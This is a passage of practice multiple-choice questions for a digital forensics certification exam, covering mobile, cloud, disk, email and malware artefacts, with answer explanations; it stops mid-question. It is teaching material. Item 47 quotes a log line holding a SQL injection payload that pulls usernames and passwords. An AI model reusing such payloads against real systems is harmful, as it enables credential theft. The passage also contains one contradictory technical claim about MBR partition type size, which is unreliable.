Option C is wrong because installing software on the suspect's computer modifies the system and contaminates evidence, violating the principle of least intrusion. Option D is wrong because witness interviews must be documented to maintain an accurate and admissible record; undocumented interviews are unreliable and not an essential first-responder action.

Exam trap

EC-Council often tests the misconception that imaging the hard drive is the first priority, but the trap here is that volatile data (RAM, network state) must be captured first to prevent permanent loss.

45
MCQmedium

An Android device is found with factory reset performed. The forensic examiner wants to recover as much data as possible. Which of the following artefacts is MOST likely to survive a factory reset and provide useful evidence?

A.Deleted SQLite records from /data/data/
B.Data stored on the external SD card
C.Google account authentication tokens stored in AccountManager
D.Wi-Fi passwords from wpa_supplicant.conf
AnswerB

An Android factory reset deliberately preserves the user-accessible external SD card (e.g., /storage/emulated/0/ or an actual removable microSD) because it is considered user data separate from the system and app data partitions. During a reset, only the /data, /cache, and sometimes /system partitions are wiped; the external SD card remains intact unless the user explicitly chooses to format it. Forensic examiners should image the external SD card immediately, as it often contains photos, documents, downloads, and application-exported files that survive the reset. This persistence makes external SD card data the only viable option for recovery.

Why this answer

Factory reset wipes the /data partition, which includes /data/data/ (app data), AccountManager tokens, and system configuration files like wpa_supplicant.conf. However, external SD cards are typically not formatted during a factory reset because they are user-removable storage. Therefore, data stored on the external SD card (e.g., photos, videos, app backups) often survives intact and can provide valuable forensic evidence.

Exam trap

The CHFI exam often tests the misconception that factory reset wipes all storage, including external SD cards, but the standard Android factory reset only targets internal partitions, leaving external storage untouched unless the user selects the additional 'Erase SD card' option.

How to eliminate wrong answers

Option A is wrong because /data/data/ is part of the internal storage that is securely wiped during a factory reset, making deleted SQLite records unrecoverable via standard forensic tools. Option C is wrong because Google account authentication tokens are stored in AccountManager within the /data/system/ partition, which is erased on factory reset. Option D is wrong because wpa_supplicant.conf resides in /data/misc/wifi/, which is also wiped during factory reset, so Wi-Fi passwords are lost.

46
MCQmedium

During a cloud forensics investigation, the investigator discovers that the cloud provider uses shared storage for multiple tenants. Which challenge is MOST likely to arise when acquiring a forensic image?

A.Physical acquisition of the storage device is required
B.No API access to the storage system
C.Inability to decrypt data at rest
D.Data commingling with other tenants
AnswerD

Data commingling with other tenants is the core challenge, as shared storage causes multiple organizations' data to occupy the same physical media, including potentially unallocated or leftover blocks. A forensic acquisition from such media may inadvertently capture another tenant's data, creating privacy, legal, and chain-of-custody complications. Investigators must employ careful isolation techniques, such as acquiring only the specific virtual disk or object while documenting that surrounding media contains unrelated data. This makes tenant-to-tenant isolation the primary difficulty in multi-tenant cloud forensics.

Why this answer

In cloud environments with shared storage, data from multiple tenants resides on the same physical or logical volume. When acquiring a forensic image, the investigator cannot isolate a single tenant's data without also capturing other tenants' data, leading to data commingling. This violates chain-of-custody and privacy principles, making it the primary challenge.

Exam trap

EC-Council often tests the misconception that physical access or encryption are the main hurdles, but the real challenge in cloud forensics is data commingling due to shared tenancy, which complicates legal and technical acquisition.

How to eliminate wrong answers

Option A is wrong because cloud storage is abstracted from physical hardware; physical acquisition is rarely possible or necessary, as forensic acquisition is performed via APIs or snapshots. Option B is wrong because cloud providers typically offer APIs (e.g., AWS S3 API, Azure Blob Storage REST API) for accessing storage, though permissions may be restricted. Option C is wrong because while encryption at rest is common, it is not an inherent challenge of shared storage; decryption keys are usually managed by the provider or tenant and can be obtained through proper legal channels.

47
MCQmedium

A security analyst reviews an Apache access log and finds the entry: '192.168.1.10 - - [10/Mar/2025:08:12:34 +0000] "GET /index.php?id=1 UNION SELECT username,password FROM users-- HTTP/1.1" 200 2345 "-" "Mozilla/5.0"'. Which attack is indicated?

A.Cross-site scripting (XSS)
B.SQL injection
C.Path traversal
D.Webshell upload
AnswerB

The UNION SELECT clause visible in the access log is a classic signature of UNION-based SQL injection. An attacker injects this clause to merge a legitimate query with an arbitrary SELECT statement, allowing retrieval of data from unrelated tables, such as user credentials or payment records. This technique is specifically designed to manipulate the database query structure rather than client-side content, file paths, or upload endpoints, making it the only answer that matches the observed log evidence.

Why this answer

The UNION SELECT statement in the URI indicates a SQL injection attack. The attacker is trying to extract data from the database.

48
MCQmedium

During a forensic examination of a Windows system, the investigator finds a file named 'notes.txt' that contains a list of passwords. The file's last modified timestamp is before the incident date, but its last accessed timestamp is during the incident. Which type of evidence is this file considered?

A.Circumstantial evidence
B.Best evidence
C.Hearsay evidence
D.Direct evidence
AnswerA

Circumstantial evidence: The access timestamp is circumstantial because it only supports an inference that the file was opened or read, without directly proving who performed the action or under what circumstances. Other processes—such as antivirus scans, Windows Search indexing, or backup software—can update the Last Access Time without any user actually opening the file. Thus, the timestamp alone requires additional corroboration to establish a fact, making it inherently indirect and therefore circumstantial evidence.

Why this answer

The file 'notes.txt' has a last modified timestamp before the incident but a last accessed timestamp during the incident. This indicates the file was opened or read during the incident, but not modified. Such indirect evidence suggests the attacker may have viewed the passwords, but does not directly prove the act of using them.

Therefore, it is circumstantial evidence because it requires inference to connect the file access to the incident.

Exam trap

EC-Council often tests the distinction between direct and circumstantial evidence by presenting timestamp data that shows access without modification, leading candidates to mistakenly classify it as direct evidence because they assume 'accessed during incident' equals 'used in the incident'.

How to eliminate wrong answers

Option B (Best evidence) is wrong because best evidence refers to the original or primary source of evidence (e.g., the original file on disk), not the type of inference drawn from timestamps. Option C (Hearsay evidence) is wrong because hearsay applies to out-of-court statements offered for their truth, not to file system metadata like timestamps. Option D (Direct evidence) is wrong because direct evidence would prove a fact without inference (e.g., a video of the attacker typing the passwords), whereas the timestamp only shows access, not the action of using the passwords.

49
MCQmedium

A forensic investigator is analyzing an ext4 file system from a Linux server. The investigator needs to locate the superblock, which contains critical file system metadata such as block size, total inode count, and mount count. The primary superblock is damaged, so the investigator must find a backup superblock. Which of the following commands or methods is most appropriate to locate a backup superblock on the ext4 file system?

A.Examine the `$MFT` file to find the backup superblock, as ext4 stores superblock backups in the Master File Table.
B.Run `mke2fs -n /dev/sdX` to simulate file system creation and display the locations of backup superblocks without writing to the device.
C.Use the `dumpe2fs` command with the `-o superblock` option to list all backup superblock locations.
D.Use the `fsck.ext4 -b 32768 /dev/sdX` command to automatically scan for and use the first available backup superblock.
AnswerB

The `mke2fs -n` command performs a dry run of file system creation, displaying the superblock and backup superblock locations without modifying the device. This is a safe way to identify backup superblocks on an ext4 file system when the primary superblock is damaged. The output includes the block size, number of blocks, and the locations of backup superblocks, which can then be used with `e2fsck -b` to repair the file system.

Why this answer

In ext4, backup superblocks are located at fixed block offsets, typically at block group boundaries. The `mke2fs -n` command simulates file system creation and prints the locations of these backup superblocks without writing to the disk, making it a safe and effective method to identify them. Other commands like `dumpe2fs` require a valid superblock to run, and `fsck.ext4 -b` needs a known backup block number.

The `$MFT` is an NTFS structure and irrelevant to ext4.

Exam trap

The trap here is confusing NTFS concepts like the `$MFT` with ext4 structures, or assuming that `fsck.ext4 -b` can automatically find backup superblocks when it requires a specific block number.

50
MCQmedium

You are responding to a suspected malware infection on a Windows 10 system. The system is still running. Which of the following should you collect FIRST?

A.Acquire a memory dump using a tool like WinPmem.
B.Collect the Windows Event Logs.
C.Export the contents of the Windows Registry.
D.Create a forensic image of the hard drive.
AnswerA

RAM is the most volatile component in a Windows system and must be captured before any other action, because it holds currently running processes, active network sockets, loaded kernel modules, injected code, and plaintext encryption keys. Using WinPmem (or similar tools) creates a raw memory image that can be analyzed for malware artifacts that exist only in volatile memory, such as reflective DLLs or rootkits. Any subsequent step in the incident response workflow will alter memory contents, so the order of volatility dictates that memory acquisition comes first.

Why this answer

When a system is still running and suspected of malware infection, the first priority is to capture volatile data, which includes the contents of RAM. WinPmem is a tool designed to acquire a memory dump from a live Windows system, preserving critical evidence such as running processes, network connections, and injected code that would be lost on shutdown. This follows the order of volatility (RFC 3227), which mandates collecting memory before any non-volatile data like logs, registry, or disk images.

Exam trap

EC-Council often tests the order of volatility (OOV) principle, and the trap here is that candidates mistakenly prioritize persistent data (logs, registry, disk image) over volatile memory, thinking they are more stable or easier to collect first.

How to eliminate wrong answers

Option B is wrong because Windows Event Logs are stored on disk and are non-volatile; collecting them first would risk losing volatile memory evidence if the system crashes or is shut down. Option C is wrong because the Windows Registry is also stored on disk (in hive files like SAM, SYSTEM, SOFTWARE) and is non-volatile; exporting it before memory acquisition violates the order of volatility. Option D is wrong because creating a forensic image of the hard drive is a time-intensive process that captures only non-volatile data, and performing it first would allow volatile evidence (e.g., running malware processes, network connections) to be lost.

51
MCQhard

An analyst discovers a hidden partition on a hard drive that does not appear in the standard MBR partition table. The drive uses GPT partitioning. Which area of the disk should be examined to find evidence of a hidden partition?

A.The Master Boot Record (MBR) in sector 0
B.The GPT header and partition entry array located after the protective MBR
C.The Volume Boot Record (VBR) of the C: drive
D.The Host Protected Area (HPA) at the end of the disk
AnswerB

The GPT header and partition entry array located after the protective MBR are exactly where partition definitions live on a GUID Partition Table disk. The primary GPT header is at Logical Block Address 1 (right after the protective MBR in sector 0), and the partition entry array follows it; the header contains the partition table checksum and pointers to the entries, while the entries themselves (with unique GUIDs, start/end LBAs, and attributes) define each partition. A hidden partition may be deliberately omitted from the active partition table, but a forensic analyst scanning the entire disk for GPT-like structures—such as the header signature 'EFI PART' and backup headers at the end—can locate an alternate or stale partition entry array that reveals the hidden partition's existence and location.

Why this answer

In GPT partitioning, the protective MBR in sector 0 only contains a single partition entry of type 0xEE to prevent legacy tools from misinterpreting the disk. The actual partition information, including any hidden partitions, is stored in the GPT header (typically in sector 1) and the partition entry array that follows. Therefore, examining the GPT header and partition entry array is necessary to detect partitions not visible in the MBR.

Exam trap

EC-CHFI often tests the misconception that the MBR is the primary source of partition information on GPT disks, leading candidates to incorrectly choose Option A, when in fact the protective MBR is only a compatibility placeholder and the real partition data resides in the GPT structures.

How to eliminate wrong answers

Option A is wrong because the MBR in sector 0 on a GPT disk is a protective MBR that does not list actual partitions; it only contains a single entry of type 0xEE covering the entire disk, so hidden partitions cannot be found there. Option C is wrong because the Volume Boot Record (VBR) of the C: drive is a boot sector specific to a volume's file system (e.g., NTFS) and does not contain the disk's partition table; it is irrelevant for discovering hidden partitions. Option D is wrong because the Host Protected Area (HPA) is a reserved area at the end of the disk used by manufacturers for diagnostic tools, not a location where hidden GPT partitions are stored; GPT hidden partitions are defined within the GPT partition entry array.

52
MCQhard

A forensic examiner is analyzing a compromised Linux system and finds a suspicious cron job in /var/spool/cron/crontabs/root that executes a script every hour. The script is located in /tmp/.hidden/update.sh. What is the BEST next step?

A.Reboot the system to clear the cron job from memory
B.Capture the script for analysis and preserve the cron entry as evidence
C.Delete the cron job immediately to prevent further damage
D.Run the script in a sandbox to determine its functionality
AnswerB

The correct response is to capture the referenced script and the cron entry itself using forensically sound methods—ideally via a live acquisition that records metadata such as file timestamps, owner, permissions, and the full path, while computing hashes (e.g., SHA-256) to verify integrity. The cron entry should be preserved from the applicable location (e.g., /var/spool/cron/crontabs/user, /etc/cron.d/, or /etc/crontab) with its modification time logged. This maintains chain of custody and enables later analysis in a controlled environment without altering the original system state.

Why this answer

The cron job entry in /var/spool/cron/crontabs/root and the associated script in /tmp/.hidden/update.sh are critical pieces of evidence. The best next step is to capture the script for malware analysis and preserve the cron entry (e.g., by making a forensic copy of the file and its metadata) to maintain the integrity of the evidence chain. Deleting or rebooting would destroy volatile data and potentially alert the attacker, while running the script without proper containment could cause further compromise.

Exam trap

EC-Council often tests the principle that preservation of evidence must precede any active response (like deletion or execution), and the trap here is that candidates mistakenly choose to delete or run the script immediately, confusing incident response with forensic preservation.

How to eliminate wrong answers

Option A is wrong because rebooting the system would clear volatile memory (RAM) and may destroy in-memory artifacts, but the cron job is stored on disk in /var/spool/cron/crontabs/root and would persist across reboots; it does not clear the cron job from disk. Option C is wrong because deleting the cron job immediately destroys evidence and could alert an attacker, violating forensic best practices of preserving the original state before analysis. Option D is wrong because running the script in a sandbox is a valid analysis step, but it should be performed only after the script and cron entry have been properly captured and preserved as evidence; the question asks for the 'best next step,' which is preservation first.

53
MCQmedium

During an email forensics investigation, an analyst examines headers and sees `Received: from mail.evil.com (192.168.1.100) by mail.victim.com` followed by `DKIM-Signature: v=1; a=rsa-sha256; d=evil.com; s=selector; bh=...; h=...; b=...`. The email claims to be from support@paypal.com. Which finding is the strongest indicator of spoofing?

A.The email was received via SMTP
B.The email lacks a SPF record in the header
C.The email originated from IP 192.168.1.100
D.The DKIM signature domain is evil.com, not paypal.com
AnswerD

A valid DKIM signature verified under the domain 'evil.com' while the From header claims 'paypal.com' is a definitive spoofing indicator. The 'd=' tag in the DKIM signature identifies which domain's private key signed the message, and Paypal's private key is cryptographically inaccessible to an attacker. Under DMARC alignment, the signing domain must match the From domain (or be an organizational parent), so this mismatch proves the message was not authorized by Paypal and is a direct sign of forgery, much stronger than SMTP or SPF observations.

Why this answer

The DKIM signature domain (d=evil.com) does not match the claimed sender domain (paypal.com). DKIM uses a digital signature verified against the public key published in the DNS of the signing domain. Since the signature is from evil.com, the email cannot be authenticated as originating from paypal.com, making this the strongest indicator of spoofing.

Exam trap

EC-Council CHFI often tests the distinction between authentication mechanisms (SPF, DKIM, DMARC) and the specific meaning of DKIM's 'd=' tag, trapping candidates who think any missing authentication header or a private IP alone is the strongest spoofing indicator.

How to eliminate wrong answers

Option A is wrong because SMTP is the standard protocol for email transmission and does not itself indicate spoofing; almost all emails are received via SMTP. Option B is wrong because the absence of an SPF record in the header does not directly prove spoofing—SPF may not be published or checked, and the header shown does not include an SPF result. Option C is wrong because the IP 192.168.1.100 is a private RFC 1918 address, which is non-routable on the public internet; its presence in a Received header often indicates internal relay or header manipulation, but it is not as definitive as the DKIM domain mismatch.

54
MCQeasy

Which forensic tool is specifically designed to recover lost partitions or file system structures and can also be used for data carving?

A.Sleuth Kit
B.EnCase
C.TestDisk
D.Volatility
AnswerC

TestDisk rebuilds damaged partition tables and lost file system structures, and its bundled PhotoRec component performs file carving from unallocated space. This satisfies the stem's dual requirement, whereas tools such as Autopsy or EnCase analyse acquired images rather than repairing partition structures.

Why this answer

TestDisk is specifically designed to recover lost partitions and repair file system structures, making it the correct choice for this scenario. It also includes data carving capabilities through its companion tool PhotoRec, allowing it to recover files from unallocated space or damaged volumes.

Exam trap

The EC-CHFI exam often tests the distinction between tools designed for storage forensics (like TestDisk) versus memory forensics (like Volatility) or general forensic suites (like EnCase), leading candidates to choose a tool that is more well-known but not specialized for partition recovery.

How to eliminate wrong answers

Option A is wrong because Sleuth Kit is a collection of command-line tools for forensic analysis of disk images, but it does not have built-in partition recovery or data carving features; it relies on external tools like PhotoRec for carving. Option B is wrong because EnCase is a commercial forensic suite that can perform data carving and partition analysis, but it is not specifically designed for recovering lost partitions or file system structures; its primary focus is evidence acquisition and analysis. Option D is wrong because Volatility is a memory forensics framework used for analyzing RAM dumps, not for storage forensics tasks like partition recovery or data carving.

55
MCQhard

An analyst discovers a suspicious file named 'cmd.aspx' in the web root of an IIS server. The file contains ASPX code that executes system commands. The IIS logs show a POST request to '/cmd.aspx' with a 200 status code. Which type of attack is indicated?

A.Webshell upload
B.SQL injection
C.Cross-site scripting (XSS)
D.Directory traversal
AnswerA

The .aspx extension indicates an ASP.NET server-side script that executes within the IIS worker process. A file named cmd.aspx typically contains C# code that calls System.Diagnostics.Process to spawn system commands, effectively giving an attacker interactive command-line access over HTTP. Its presence in the web root without a correlated legitimate upload points to an uploaded webshell, not an attack that injects ephemeral code or manipulates path parameters.

Why this answer

The presence of a file named 'cmd.aspx' in the IIS web root that executes system commands, combined with a POST request returning a 200 status code, indicates a webshell upload attack. An attacker has uploaded an ASPX file that acts as a backdoor, allowing remote command execution via HTTP POST requests, which is a classic webshell scenario.

Exam trap

In CHFI, candidates often confuse webshell upload with directory traversal, mistakenly thinking the POST request to an existing file indicates traversal rather than recognizing the uploaded executable payload.

How to eliminate wrong answers

Option B is wrong because SQL injection involves manipulating SQL queries through input fields, not uploading executable files to the web root. Option C is wrong because cross-site scripting (XSS) injects client-side scripts into web pages viewed by other users, not server-side command execution via an uploaded file. Option D is wrong because directory traversal exploits path manipulation to access files outside the web root, not the upload and execution of a command shell file within the web root.

56
MCQmedium

A forensic investigator is required to testify in court about the findings of a digital investigation. Which of the following roles does the investigator fulfill?

A.Expert witness
B.Lay witness
C.Character witness
D.Fact witness
AnswerA

An expert witness is permitted to offer opinion testimony under Federal Rule of Evidence 702 if their scientific, technical, or other specialized knowledge will help the trier of fact understand the evidence. A forensic investigator testifying about digital evidence analysis qualifies because they apply accepted forensic methodologies like write-blocking, hashing, and timeline analysis to form conclusions. The court recognizes the investigator's expertise and allows them to opine on the significance of the evidence, making this the correct classification.

Why this answer

A is correct because a forensic investigator who testifies about their analysis and conclusions—such as interpreting file system artifacts, registry data, or network logs—qualifies as an expert witness under Federal Rule of Evidence 702. The investigator’s testimony goes beyond mere fact recitation; it applies specialized knowledge, training, and experience to form opinions about the digital evidence, which is the hallmark of an expert witness.

Exam trap

The trap here is that candidates confuse 'fact witness' with 'expert witness,' assuming that any testimony about digital evidence is factual, but the key distinction is whether the testimony involves opinion or interpretation based on specialized knowledge—if it does, the investigator is an expert witness.

How to eliminate wrong answers

Option B is wrong because a lay witness can only testify to facts within their personal knowledge (e.g., 'I saw the suspect at the computer'), not to technical interpretations or conclusions derived from forensic analysis. Option C is wrong because a character witness testifies about a person’s reputation or moral traits, not about digital evidence or investigative findings. Option D is wrong because a fact witness (also called a percipient witness) merely recounts what they directly observed or experienced, without offering expert opinions or technical analysis of forensic data.

57
MCQhard

A security analyst observes a process on a Windows system creating a mutex named "Global\{5B9E4E7E-8B2C-4F6D-A1A3-F2C8D9E0A1B2}" shortly after execution. The analyst also notes outbound connections to an IP address 203.0.113.50 on port 4444. Which malware behaviour indicator is MOST clearly demonstrated?

A.Anti-debugging technique through timing checks
B.Single-instance execution safeguard and command and control communication
C.File encryption using a hardcoded AES key
D.Persistence mechanism via registry run keys
AnswerB

The named mutex is a classic single-instance safeguard: malware creates a distinctive mutex (e.g., a hardcoded name) so that if a second copy starts, it detects the existing mutex and exits, preventing duplicate infections or conflicting state. The concurrent outbound network connection is a strong indicator of command-and-control communication, as the process attempts to establish a channel to an external server for instructions or data exfiltration. Together, these two behaviors align with the observed evidence, making this the correct interpretation.

Why this answer

The mutex name 'Global\{5B9E4E7E-8B2C-4F6D-A1A3-F2C8D9E0A1B2}' is a well-known technique used by malware to ensure only one instance of itself runs on the system, preventing conflicts or multiple infections. The outbound connection to 203.0.113.50 on TCP port 4444 is a classic indicator of command and control (C2) communication, as port 4444 is commonly associated with reverse shells and C2 traffic (e.g., Metasploit default). Together, these two behaviors directly demonstrate single-instance execution safeguard and C2 communication.

Exam trap

EC-Council often tests the distinction between behavioral indicators (like mutex and network connections) and specific malware capabilities (like encryption or persistence), leading candidates to confuse a single-instance safeguard with anti-debugging or persistence techniques.

How to eliminate wrong answers

Option A is wrong because anti-debugging through timing checks involves measuring code execution time to detect debugger presence, not mutex creation or outbound connections. Option C is wrong because file encryption with a hardcoded AES key would manifest as file I/O operations and cryptographic API calls, not a mutex or a network connection on port 4444. Option D is wrong because persistence via registry run keys involves writing to 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run' or similar, which is not indicated by the mutex or the outbound connection.

58
MCQmedium

Which of the following tools is specifically designed for forensic imaging and can create compressed, segmented, or E01 format images?

A.dd
B.Nmap
C.FTK Imager
D.Wireshark
AnswerC

FTK Imager is a GUI-based forensic imaging tool from AccessData (now Exterro) specifically built for lawful evidence acquisition. It natively supports acquisition in multiple formats, including raw (DD), E01 (Expert Witness), and the AFF format, and allows compression and segmentation of images for practical storage and transfer. The tool also generates MD5 and SHA1 hashes for integrity verification, supports read-only mounting of images for analysis, and is widely accepted in courts as a forensically sound imaging platform.

Why this answer

FTK Imager is specifically designed for forensic imaging and supports creating compressed, segmented, and E01 (Expert Witness Format) images. Unlike generic tools, it provides a GUI and built-in validation (e.g., MD5/SHA1 hashing) tailored for forensic acquisition, making it the correct choice for this question.

Exam trap

The trap here is that candidates often confuse dd's ability to create raw images with forensic imaging capabilities, overlooking that dd lacks native support for compression, segmentation, and E01 format, which are hallmarks of dedicated forensic tools like FTK Imager.

How to eliminate wrong answers

Option A is wrong because dd is a Unix/Linux command-line tool for bit-for-bit copying, but it does not natively support compressed, segmented, or E01 format images without additional wrappers or scripts. Option B is wrong because Nmap is a network scanning tool used for port discovery and service enumeration, not for forensic imaging. Option D is wrong because Wireshark is a network protocol analyzer used for packet capture and analysis, not for creating forensic disk images.

59
MCQeasy

In the context of cloud forensics, what is the primary challenge associated with volatile evidence in Infrastructure as a Service (IaaS) environments?

A.Evidence can be lost when the cloud instance is stopped or terminated
B.Evidence may be stored across multiple jurisdictions
C.Encryption of data at rest prevents access to evidence
D.Cloud providers may not allow forensic investigators to access the physical hardware
AnswerA

Stopping or terminating a cloud instance clears volatile memory (RAM), which contains running processes, open network connections, kernel objects, and other live forensic evidence that exists only while the OS is executing. Unlike persistent block storage, this in-memory state is not captured by ordinary disk snapshots, and recovery becomes impossible once the hypervisor reclaims the memory pages. Therefore, forensic investigators must acquire memory before shutdown using live acquisition techniques or pre-configured collection mechanisms, making this the primary volatility-specific challenge.

Why this answer

Volatile evidence such as memory and running processes disappears when an instance is stopped or terminated, making timely acquisition critical.

60
Multi-Selecthard

Which FOUR of the following are persistence mechanisms that can be used on Linux systems?

Select 4 answers
A.Prefetch files
B.SSH authorized keys
C.Startup scripts in /etc/init.d
D.Cron jobs
E.Modifications to /etc/passwd to add new users
AnswersB, C, D, E

SSH authorized keys are a persistence mechanism because they enable an attacker to retain remote access without needing to re-exploit the system each time; by placing a public key in a user's ~/.ssh/authorized_keys file, the attacker can authenticate over SSH indefinitely, even if the user's password is changed. While they do not autonomously execute commands like cron or init scripts, the ongoing availability of a credentialed login channel is a recognized persistence technique in intrusion activity and should be examined in a forensic investigation.

Why this answer

Persistence mechanisms on Linux include SSH authorized keys (B), which allow an attacker to maintain remote access by adding their public key to the target user's authorized_keys file; startup scripts in /etc/init.d (C), which execute at boot; cron jobs (D), which run scheduled tasks; and modifications to /etc/passwd (E) to create persistent user accounts. Prefetch files (A) are Windows-specific and not a Linux persistence mechanism.

Exam trap

The trap is selecting Prefetch files (A), which are often associated with persistence on Windows but do not apply to Linux. All other options are valid Linux persistence mechanisms.

61
MCQhard

A forensic investigator is analyzing a RAID 0 array consisting of two disks. She uses FTK Imager to acquire the logical drive. However, the data appears interleaved. What additional step is necessary to properly assemble the image?

A.Use EnCase to acquire each disk separately and mount as a RAID volume
B.Simply reorder the disk images alphabetically
C.Reconstruct the RAID by determining stripe size and order, then combine the images
D.Use PhotoRec to carve files from raw images
AnswerC

RAID 0 stores data in fixed-size stripes (also called chunks) that are interleaved across the member disks, so reconstructing the logical volume requires knowing two critical parameters: the stripe/chunk size (e.g., 64 KiB, 128 KiB) and the exact order of disks in the RAID set. These parameters are found in the RAID metadata (md superblock, DDF, Intel RST, etc.) present on each disk or can sometimes be inferred from filesystem geometry. Once the stripe size and disk order are determined, the forensic examiner must interleave the data from each disk image at the appropriate byte offsets—combining them in a way that preserves the original block sequence. Only after this de-interleaving can the reconstructed image be parsed by tools like FTK Imager or X-Ways to access the logical filesystem.

Why this answer

RAID 0 uses striping to distribute data across multiple disks, so a logical acquisition of the array will appear interleaved without the stripe parameters. To properly assemble the image, the investigator must determine the stripe size and the order of the disks, then combine the raw images accordingly. This reconstruction ensures the data is read in the correct sequence, allowing file system analysis tools to interpret the logical volume correctly.

Exam trap

The trap here is that candidates assume a logical acquisition of a RAID array will automatically yield a usable image, but they overlook the need to reconstruct the stripe order and size to resolve the interleaved data.

How to eliminate wrong answers

Option A is wrong because EnCase does not natively mount RAID volumes; it acquires disks as raw images, and the investigator would still need to manually reconstruct the stripe parameters. Option B is wrong because simply reordering disk images alphabetically does not account for the stripe size or the correct interleave pattern, resulting in corrupted data. Option D is wrong because PhotoRec is a file carving tool that recovers files based on headers and footers, but it cannot reassemble a striped RAID array; it would only recover fragmented files from the interleaved data.

62
MCQmedium

During a network breach investigation, an analyst examines NetFlow records and sees large data transfers from a server to an external IP address during off-hours. Which type of activity does this MOST likely indicate?

A.Normal software update download
B.Scheduled backup to a cloud service
C.Data exfiltration by an attacker
D.Denial-of-service attack against the server
AnswerC

Data exfiltration is the correct interpretation because an attacker who has gained access will often locate and stage sensitive files, compress and encrypt them to avoid detection, and then transmit that archive to an external server they control. The combination of large outbound traffic, off-hours timing, and an unknown destination IP is a classic indicator of the exfiltration phase of an intrusion. This aligns with the MITRE ATT&CK technique T1048 (Exfiltration Over Alternative Protocol) and warrants immediate correlation with process execution and endpoint logs to identify the staging artifacts.

Why this answer

Large data transfers from a server to an external IP address during off-hours are a classic indicator of data exfiltration. NetFlow records capture metadata such as source/destination IPs, ports, and byte counts; a sudden, high-volume outbound flow to an unfamiliar external IP outside normal business hours strongly suggests an attacker is copying sensitive data out of the network, not legitimate traffic.

Exam trap

EC-CHFI often tests the distinction between outbound data flows (exfiltration) and inbound traffic (DoS), so the trap here is confusing the direction of the traffic—candidates may pick DoS because they associate large transfers with attacks, but DoS targets the server with inbound floods, not outbound data theft.

How to eliminate wrong answers

Option A is wrong because software update downloads typically originate from the server to known vendor update servers (e.g., Microsoft, Adobe) and occur during business hours or maintenance windows, not off-hours to an arbitrary external IP. Option B is wrong because scheduled backups to a cloud service usually use well-known destinations (e.g., AWS S3, Azure Blob) with consistent timing and are often encrypted; the scenario lacks any mention of a recognized cloud provider or backup schedule. Option D is wrong because a denial-of-service attack against the server would generate high inbound traffic to the server, not large outbound data transfers from the server to an external IP.

63
Multi-Selectmedium

Which TWO of the following are Windows artifacts that can provide evidence of file execution, including timestamps and paths?

Select 2 answers
A.Event ID 4720
B.SAM registry hive
C.Prefetch files (*.pf)
D.Pagefile.sys
E.LNK files
AnswersC, E

Prefetch files are created by Windows for each executable launched from a non-readonly path (with Application Prefetching enabled) to speed up subsequent loads. They store the executable's file path, a hash of the path, the number of times it was run, the last run timestamp, and the list of files and devices accessed during the first few seconds of execution. These artifacts allow forensic analysts to determine whether a specific application was executed, when it was executed, and how frequently.

Why this answer

Prefetch files (*.pf) are correct because Windows creates them in C:\Windows\Prefetch when applications execute, and each .pf file records the executable name, run count, last-run timestamps, and referenced file/directory paths, directly evidencing execution. LNK files are correct because Windows shortcut files, typically found in Recent Items, Office Recent, or Jump Lists, store the target path, volume information, and MAC timestamps of the referenced file, showing that a file was opened or executed. Event ID 4720 is not correct because it records user account creation in the Security log, not file execution.

The SAM registry hive is not correct because it stores local account and group information, including password hashes, not execution evidence. Pagefile.sys is not correct because it is virtual memory swap space that may contain residual data but is not a structured artifact specifically recording file execution timestamps and paths.

Exam trap

The CHFI exam often tests the distinction between artifacts that directly record execution (Prefetch, LNK) versus those that store unrelated system data (SAM, Event ID 4720) or provide only indirect evidence (Pagefile.sys), leading candidates to confuse memory artifacts with structured execution logs.

64
MCQeasy

Which tool is specifically designed to perform physical extraction of data from mobile devices, including bypassing lock screens on many iOS and Android devices?

A.SIFT Workstation
B.FTK Imager
C.Cellebrite UFED
D.Wireshark
AnswerC

Cellebrite UFED (Universal Forensic Extraction Device) is a purpose-built mobile forensic tool specifically engineered to perform physical extraction from smartphones, tablets, and feature phones. It covers bootloader-level and exploit-based acquisition paths, enabling full filesystem images even when the screen is locked, and it also supports logical, file system, and chip-off/ISP extractions across thousands of device models. Its proprietary hardware and continuously updated breakout software make it the industry standard for extracting evidence from mobile devices when physical acquisition is required.

Why this answer

Cellebrite UFED (Universal Forensic Extraction Device) is a specialized hardware and software tool designed for physical extraction of data from mobile devices, including bypassing lock screen security on iOS and Android devices. It uses advanced techniques such as bootloader exploits, JTAG, chip-off, and proprietary software-based methods to acquire full file system images, even when the device is locked or encrypted.

Exam trap

EC-Council often tests the distinction between logical extraction (e.g., via ADB or iTunes backup) and physical extraction, and candidates may confuse FTK Imager (a computer forensics tool) with mobile extraction tools, missing that Cellebrite UFED is the only option capable of bypassing lock screens via hardware-level exploits.

How to eliminate wrong answers

Option A is wrong because SIFT Workstation is a forensic analysis platform for disk and memory analysis, not a mobile device extraction tool, and it cannot bypass lock screens. Option B is wrong because FTK Imager is a disk imaging tool for computers and storage media, lacking the hardware interfaces and exploit capabilities needed for mobile device physical extraction. Option D is wrong because Wireshark is a network protocol analyzer used for capturing and inspecting network traffic, not for physical data extraction from mobile devices.

65
MCQeasy

A forensic analyst finds a partition that uses the Master Boot Record (MBR) scheme. Which of the following is TRUE about the MBR partition table?

A.It uses a 128-bit Globally Unique Identifier (GUID) for partitions
B.It supports disks larger than 2 TiB
C.It stores partition information in a 64-byte table
D.It stores a backup partition table at the end of the disk
AnswerC

In the first sector, offset 446 contains the MBR's 64-byte partition table, which is exactly four 16-byte entries. Each entry encodes the bootable flag, CHS start/end addresses, an 8-bit partition type, and 32-bit LBA start and size fields. This fixed 64-byte table is the definitive MBR structure, making this statement the correct identifying feature.

Why this answer

The MBR partition table is exactly 64 bytes in size, divided into four 16-byte entries. Each entry stores the starting and ending CHS/LBA addresses, partition type, and boot flag. This fixed-size table is the defining characteristic of the MBR scheme, limiting it to four primary partitions.

Exam trap

The trap here is that candidates confuse MBR's fixed 64-byte table with GPT's GUID-based entries, or assume MBR supports large disks because modern OSes can still read them, ignoring the 2 TiB addressing limit.

How to eliminate wrong answers

Option A is wrong because MBR uses a 32-bit partition type identifier (byte at offset 4 of each entry), not a 128-bit GUID; GUID Partition Table (GPT) uses GUIDs. Option B is wrong because MBR uses 32-bit LBA addresses, limiting the maximum addressable disk size to 2 TiB (2^32 × 512 bytes); GPT supports larger disks. Option D is wrong because MBR does not store a backup partition table; GPT stores a backup at the end of the disk for redundancy.

66
Multi-Selecteasy

Which TWO of the following are examples of file carving tools? (Select two.)

Select 2 answers
A.WinPmem
B.FTK Imager
C.PhotoRec
D.Foremost
